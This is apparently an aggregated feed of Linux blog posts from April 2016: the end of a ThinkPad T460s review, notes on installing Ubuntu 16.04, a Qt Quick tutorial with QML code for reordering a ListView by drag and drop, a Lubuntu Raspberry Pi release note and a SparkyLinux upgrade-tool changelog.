    (One audio-related annoyance that I can't really fault Lenovo for overlooking is that at some volumes certain frequencies will vibrate the anti-static plastic tape that is on the inside of the laptop covering parts of the motherboard. That's my theory at least, I haven't removed the tape to test it.)

    Does it run Linux?

    Since I and probably many of you care about Linux support, I'm glad to say it does. However, since the T460s is brand new hardware, there may be issues running distros that ship older kernels (but I haven't tested that so don't hold me to it). But I'm all about using the latest and greatest, and Ubuntu 16.04 installs and works without a hitch. Driver-wise, the only thing that has no support at all is the fingerprint reader –which is no big loss– but everything else works great. That being said, that painlessness is due to the fact that Ubuntu ships proprietary drivers, if you care about that sort of thing.

The T460s comes with Windows 10, obviously, which is authenticated for Secure Boot (no entering license keys!) so you shouldn't have a problem reinstalling Windows 10 if you choose to do so.

    Bottom Line

If you like the ThinkPad aesthetic (as I do), don't mind the battery losses in exchange for a new thinner body, and are looking for a great (Linux) laptop, then I'd very much recommend the T460s. The drawbacks it does have lie mostly with its mediocre speakers.

    In my view, the best ThinkPads are and always will be machines for getting stuff done without compromising performance, durability or productivity. If you'd prefer a laptop with a flashier design and higher specs for the sake of higher specs, or if you value things like brushed aluminum and pounding bass, look elsewhere. But know that none of those other laptops are a ThinkPad.

• Hardware & Design: 9
• Keyboard: 10
• Touchpad: 8
• Display: 9
• Speakers: 7
• Battery: 8
• Heat & Noise: 8
• Performance: 8
• Linux Compatibility: 10

    25 April, 2016 05:00AM

    April 24, 2016

    Svetlana Belkin: Ubuntu 16.04

A few days ago, the next long term support (LTS) release of Ubuntu was released, code named Xenial Xerus. Like many, I decided to upgrade, but not like the last four times, where I upgraded directly. This time I decided to freshly install Ubuntu 16.04, because I started to run into the whole “problems on top of problems” issue. My other excuse was to see if I could write a pair of scripts that automate the backup/restore process, which I was able to do with the help of a fellow friend of mine: Simon Quigley.

I used 16.04 for maybe a week before the release, to test out the script and also to test out the system. I hate to say this, but I don’t really see or feel a difference between the last LTS and this one. Perhaps I didn’t explore it enough because I didn’t have time, or maybe I’m still a basic end-user. The only two differences I noted were that my favorite IRC client, X-Chat, isn’t in the repos, which I can understand since it’s not being maintained anymore, and that the file manager got a makeover for external drives (now listed as “Other Locations”).

Because X-Chat isn’t in the repos, I decided to switch to Irssi. I will also kick off a new series of posts titled “What I use on Ubuntu”, which will explain what programs I use and how I use them.

    24 April, 2016 09:15PM

    Aurélien Gâteau: Reordering a Qt Quick ListView via drag'n'drop - part 1

It is common in user interfaces to provide the user with a list of elements which can be reordered by dragging them around. Displaying a list of elements with Qt Quick is easy, thanks to the ListView component. Giving the user the ability to reorder them is less straightforward. This three-part article series presents one way to implement this.

    The goal of this first article is to create a list which can be used like this:

    Reordering elements in a ListView

    Architecture

    The approach I used was to do all the work in a DraggableItem, leaving the ListView untouched. DraggableItem is used as the delegate of the ListView, and wraps the real QML item responsible for showing the details of the list element.

Let's start with main.qml. Nothing fancy at the beginning: we create a Window and a ListModel defining our elements:

    import QtQuick 2.6
    import QtQuick.Window 2.2
    import QtQuick.Controls 1.4
    import QtQuick.Layouts 1.1
    
    Window {
        visible: true
        width: 500
        height: 400
    
        ListModel {
            id: myModel
            ListElement {
                text: "The Phantom Menace"
            }
            ListElement {
                text: "Attack of the Clones"
            }
            ListElement {
                text: "Revenge of the Siths"
            }
            ListElement {
                text: "A New Hope"
            }
            ListElement {
                text: "The Empire Strikes Back"
            }
            ListElement {
                text: "Return of the Jedi"
            }
            ListElement {
                text: "The Force Awakens"
            }
        }
    

    Now comes the main Item. It contains a ColumnLayout which holds a Rectangle faking a toolbar and our ListView, wrapped in a ScrollView:

    Item {
        id: mainContent
        anchors.fill: parent
        ColumnLayout {
            anchors.fill: parent
            spacing: 0
    
            Rectangle {
                color: "lightblue"
                height: 50
                Layout.fillWidth: true
    
                Text {
                    anchors.centerIn: parent
                    text: "A fake toolbar"
                }
            }
    
            ScrollView {
                Layout.fillWidth: true
                Layout.fillHeight: true
                ListView {
                    id: listView
                    model: myModel
                    delegate: DraggableItem {
                        Rectangle {
                            height: textLabel.height * 2
                            width: listView.width
                            color: "white"
    
                            Text {
                                id: textLabel
                                anchors.centerIn: parent
                                text: model.text
                            }
    
                            // Bottom line border
                            Rectangle {
                                anchors {
                                    left: parent.left
                                    right: parent.right
                                    bottom: parent.bottom
                                }
                                height: 1
                                color: "lightgrey"
                            }
                        }
    
                        draggedItemParent: mainContent
    
                        onMoveItemRequested: {
                            myModel.move(from, to, 1);
                        }
                    }
                }
            }
    

    We can see DraggableItem used as a delegate of the ListView. Its API is simple: it wraps another item which shows the content (here it is a rectangle with a text and a one-pixel border at the bottom).

    DraggableItem has one property: draggedItemParent, which defines which item becomes the parent of our content item while it is being dragged around. Setting this to the main content of your window gives a more natural feeling when you drag the item below or above the ListView: the item is not clipped to its view and appears on top of the other UI elements.

It also has a signal: moveItemRequested, which is emitted when the user has dragged an item from one place to another. In this example we use ListModel.move to react to it, but if you use a custom model you could call any other method.

    DraggableItem implementation

    DraggableItem contains a contentItemWrapper item, which is the parent of the DraggableItem child. When we start dragging, contentItemWrapper is reparented to the item specified in the draggedItemParent property of DraggableItem.

    This is the beginning of DraggableItem.qml, it shows how contentItem is wrapped inside contentItemWrapper:

    import QtQuick 2.0
    
    Item {
        id: root
    
        default property Item contentItem
    
        // This item will become the parent of the dragged item during the drag operation
        property Item draggedItemParent
    
        signal moveItemRequested(int from, int to)
    
        width: contentItem.width
        height: contentItem.height
    
        // Make contentItem a child of contentItemWrapper
        onContentItemChanged: {
            contentItem.parent = contentItemWrapper;
        }
    
        Rectangle {
            id: contentItemWrapper
            anchors.fill: parent
    

    Let's finish the definition of contentItemWrapper and continue with the code necessary to start the drag:

    // ... contentItemWrapper, continued from the snippet above
            Drag.active: dragArea.drag.active
            Drag.hotSpot {
                x: contentItem.width / 2
                y: contentItem.height / 2
            }
    
            MouseArea {
                id: dragArea
                anchors.fill: parent
                drag.target: parent
                // Keep the dragged item at the same X position. Nice for lists, but not mandatory
                drag.axis: Drag.YAxis
                // Disable smoothed so that the Item pixel from where we started the drag remains
                // under the mouse cursor
                drag.smoothed: false
    
                onReleased: {
                    if (drag.active) {
                        emitMoveItemRequested();
                    }
                }
            }
        }
    
        states: [
            State {
                when: dragArea.drag.active
                name: "dragging"
    
                ParentChange {
                    target: contentItemWrapper
                    parent: draggedItemParent
                }
                PropertyChanges {
                    target: contentItemWrapper
                    opacity: 0.9
                    anchors.fill: undefined
                    width: contentItem.width
                    height: contentItem.height
                }
                PropertyChanges {
                    target: root
                    height: 0
                }
            }
        ]
    

    A few things are worth noting here:

    To create a draggable area, we use a MouseArea with the drag.target property set to the Item we want to drag.

    In contentItemWrapper, we set Drag.active to dragArea.drag.active. If we did not do this, we would still be able to drag our Item, but DropAreas would not notice it moving over them (DropArea.containsDrag would remain false). We also set Drag.hotSpot to the center of the dragged item. The hot spot is the coordinate within the dragged item which DropAreas use to determine whether a dragged item is over them.

    When we start dragging, we change to the "dragging" state. In this state contentItemWrapper is reparented to draggedItemParent and the DraggableItem height is reduced to 0, completely hiding it.

    Unless you associate data with your drag, for example to implement dragging from one application to another, the DropArea won't emit the dropped signal. This is why we trigger the move from the handler of the MouseArea released signal.
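
    If you do want DropArea to emit dropped, an alternative (not used in this article) is to start an automatic drag that carries MIME data. A rough sketch of the relevant lines, assuming the internal drag used here is replaced:

    // In contentItemWrapper, instead of relying on onReleased:
    Drag.dragType: Drag.Automatic
    Drag.mimeData: ({ "text/plain": model.text })  // parentheses keep this an object literal

    // ...and in a DropArea that should receive the drop:
    DropArea {
        onDropped: console.log("dropped:", drop.text)  // drop.text carries the "text/plain" data
    }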

    Dropping

    Now that we have the "drag" part, we need to take care of the "drop" part.

    Each DraggableItem contains a DropArea which is the same size as the DraggableItem and straddles the boundary between its DraggableItem and the one below it. This way, when the user drops an item on a DropArea, we know we have to insert the dragged item after the item which owns the DropArea.

    There is a special case though: we also want the user to be able to drop an item before the first item. To handle this, the first DraggableItem of the list is going to be special: it will have another DropArea, with its vertical center aligned to the top edge of the DraggableItem.

    This diagram should make it clearer:

    [Diagram: DropArea positions]

    As you can see, "Item 0" has two DropAreas, whereas the other items only have one. Here is the code which adds the DropAreas:

    Loader {
        id: topDropAreaLoader
        active: model.index === 0
        anchors {
            left: parent.left
            right: parent.right
            bottom: root.verticalCenter
        }
        height: contentItem.height
        sourceComponent: Component {
            DraggableItemDropArea {
                dropIndex: 0
            }
        }
    }
    
    DraggableItemDropArea {
        anchors {
            left: parent.left
            right: parent.right
            top: root.verticalCenter
        }
        height: contentItem.height
        dropIndex: model.index + 1
    }
    

    We use a Loader to create the special DropArea for the first item of the list. DraggableItemDropArea is just a DropArea with a dropIndex property and a Rectangle to show a drop indicator. Before showing its code, let's finish the code of DraggableItem. The only remaining part is the function responsible for emitting the moveItemRequested signal:

    function emitMoveItemRequested() {
        var dropArea = contentItemWrapper.Drag.target;
        if (!dropArea) {
            return;
        }
        var dropIndex = dropArea.dropIndex;
    
        // If the target item is below us, then decrement dropIndex because the target item is
        // going to move up when our item leaves its place
        if (model.index < dropIndex) {
            dropIndex--;
        }
        if (model.index === dropIndex) {
            return;
        }
        root.moveItemRequested(model.index, dropIndex);
    }
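
    For example, if item 1 is dropped on the DropArea below item 3, dropArea.dropIndex is 4. Because item 1 leaves its place, items 2 and 3 shift up by one, so the decremented dropIndex of 3 is the correct destination and myModel.move(1, 3, 1) puts the dragged item right after the old item 3.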
    

    That's it for DraggableItem.

    DraggableItemDropArea

    Not much complexity here; we will actually remove this component later in the series. Here is the code:

    import QtQuick 2.0
    
    DropArea {
        id: root
        property int dropIndex
    
        Rectangle {
            id: dropIndicator
            anchors {
                left: parent.left
                right: parent.right
                top: dropIndex === 0 ? parent.verticalCenter : undefined
                bottom: dropIndex === 0 ? undefined : parent.verticalCenter
            }
            height: 2
            opacity: root.containsDrag ? 0.8 : 0.0
            color: "red"
        }
    }
    

    DraggableItemDropArea adds a dropIndex property and a Rectangle to draw the two-pixel red line indicating where the item is going to be dropped, with a small hack to position the Rectangle correctly for the special case of the top DropArea of the first DraggableItem.

    That's it for this first article in the series. You can find the source code in the associated GitHub repository, under the "1-base" tag. You can now continue to the next article of the series.

    24 April, 2016 04:28PM

    Lubuntu Blog: Ubuntu 16.04 LTS on the Raspberry Pi 2!

    The Raspberry Pi 2 version of Lubuntu has been updated to Lubuntu 16.04 LTS. It is now available in the downloads section. Grab it while it’s hot!

    24 April, 2016 01:18PM

    hackergotchi for SparkyLinux

    SparkyLinux

    APTus Upgrade 0.1.23

     

    There are some changes in Sparky’s default upgrade tool, Sparky APTus Upgrade (aka System Upgrade) 0.1.23, such as:

    – added a ‘--no-install-recommends’ option (not enabled by default) to avoid installing extra packages which are not dependencies of the existing ones but are only recommended and would otherwise be installed by default. With the new option enabled, the upgrade process will not install recommended packages. The first option, called “Upgrade”, still performs a full system upgrade as before.

    – the changelog is now displayed in a Yad window instead of a text editor. It is also trimmed, keeping only the most important lines.

    All the scripts have been reconfigured, so please install and test the new version.

    The ‘sparky-aptus-upgrade’ 0.1.23 package is available from Sparky’s ‘unstable’ repository.

     

    24 April, 2016 11:37AM by pavroo